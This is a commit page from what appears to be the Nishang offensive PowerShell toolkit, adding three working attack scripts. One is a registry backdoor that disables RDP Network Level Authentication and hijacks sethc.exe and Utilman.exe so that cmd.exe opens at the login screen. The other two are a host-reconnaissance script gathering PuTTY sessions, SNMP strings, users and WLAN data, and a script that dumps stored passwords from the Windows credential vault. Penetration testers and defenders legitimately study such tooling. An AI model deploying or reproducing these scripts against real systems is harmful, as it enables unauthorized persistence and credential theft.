Trimmed Invoke-MimkatzWDigestDowngrade

samratashok · Jan 2, 2016 · fc7dcba · fc7dcba
1 parent 8c2778e
commit fc7dcba
Show file tree

Hide file tree

Showing 4 changed files with 95 additions and 2,756 deletions.
diff --git a/Backdoors/Add-RegBackdoor.ps1 b/Backdoors/Add-RegBackdoor.ps1
@@ -0,0 +1,20 @@
+
+function Add-RegBackdoor
+{
+    [CmdletBinding()] Param(
+        [Parameter(Position = 0, Mandatory = $False)]
+        [String]
+        $Payload = "cmd.exe"
+    )
+
+    #Disable Network Level Authentication
+    Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" -Name SecurityLayer -Value 1
+
+
+    New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+    Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" -Name Debugger -Value $Payload
+
+
+    New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe"
+    Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" -Name Debugger -Value $Payload
+}
diff --git a/Gather/Get-Information 1.ps1 b/Gather/Get-Information 1.ps1
@@ -0,0 +1,60 @@
+
+function Get-Information 
+{
+<#
+.SYNOPSIS
+Nishang Payload which gathers juicy information from the target.
+
+.DESCRIPTION
+This payload extracts information form registry and some commands. 
+The information available would be dependent on the privilege with which the script would be executed.
+
+.EXAMPLE
+PS > Get-Information
+
+Use above to execute the function.
+
+.LINK
+http://labofapenetrationtester.blogspot.com/
+https://github.com/samratashok/nishang
+#>
+    [CmdletBinding()]
+    Param ()
+
+    function registry_values($regkey, $regvalue,$child) 
+    { 
+        if ($child -eq "no"){$key = get-item $regkey} 
+        else{$key = get-childitem $regkey} 
+        $key | 
+        ForEach-Object { 
+        $values = Get-ItemProperty $_.PSPath 
+        ForEach ($value in $_.Property) 
+        { 
+        if ($regvalue -eq "all") {$values.$value} 
+        elseif ($regvalue -eq "allname"){$value} 
+        else {$values.$regvalue;break} 
+        }}} 
+    $output = "Logged in users:`n" + ((registry_values "hklm:\software\microsoft\windows nt\currentversion\profilelist" "profileimagepath") -join "`r`n") 
+    $output = $output + "`n`n Powershell environment:`n" + ((registry_values "hklm:\software\microsoft\powershell" "allname")  -join "`r`n") 
+    $output = $output + "`n`n Putty trusted hosts:`n" + ((registry_values "hkcu:\software\simontatham\putty" "allname")  -join "`r`n") 
+    $output = $output + "`n`n Putty saved sessions:`n" + ((registry_values "hkcu:\software\simontatham\putty\sessions" "all")  -join "`r`n") 
+    $output = $output + "`n`n Recently used commands:`n" + ((registry_values "hkcu:\software\microsoft\windows\currentversion\explorer\runmru" "all" "no")  -join "`r`n") 
+    $output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no")  -join "`r`n") 
+    $output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no")  -join "`r`n") 
+    $output = $output + "`n`n More details for current user:`n" + ((registry_values "hkcu:\Volatile Environment" "all" "no")  -join "`r`n") 
+    $output = $output + "`n`n SNMP community strings:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no")  -join "`r`n") 
+    $output = $output + "`n`n SNMP community strings for current user:`n" + ((registry_values "hkcu:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no")  -join "`r`n") 
+    $output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname")  -join "`r`n") 
+    $output = $output + "`n`n Installed Applications for current user:`n" + ((registry_values "hkcu:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname")  -join "`r`n") 
+    $output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no")  -join "`r`n") 
+    $output = $output + "`n`n Contents of /etc/hosts:`n" + ((get-content -path "C:\windows\System32\drivers\etc\hosts")  -join "`r`n") 
+    $output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n") 
+    $output = $output + "`n`n Account Policy:`n" + ((net accounts)  -join "`r`n") 
+    $output = $output + "`n`n Local users:`n" + ((net user)  -join "`r`n") 
+    $output = $output + "`n`n Local Groups:`n" + ((net localgroup)  -join "`r`n") 
+    $output = $output + "`n`n WLAN Info:`n" + ((netsh wlan show all)  -join "`r`n") 
+    $output
+
+
+}
+Get-Information
diff --git a/Gather/Get-WebCredentials.ps1 b/Gather/Get-WebCredentials.ps1
@@ -0,0 +1,9 @@
+#Requires -Version 3
+#Script to retrieve web credentials from Windows vault
+#http://stackoverflow.com/questions/9221245/how-do-i-store-and-retrieve-credentials-from-the-windows-vault-credential-manage
+function Get-WebCredentials.ps1
+{
+$ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
+$VaultObj = new-object Windows.Security.Credentials.PasswordVault
+$VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }
+}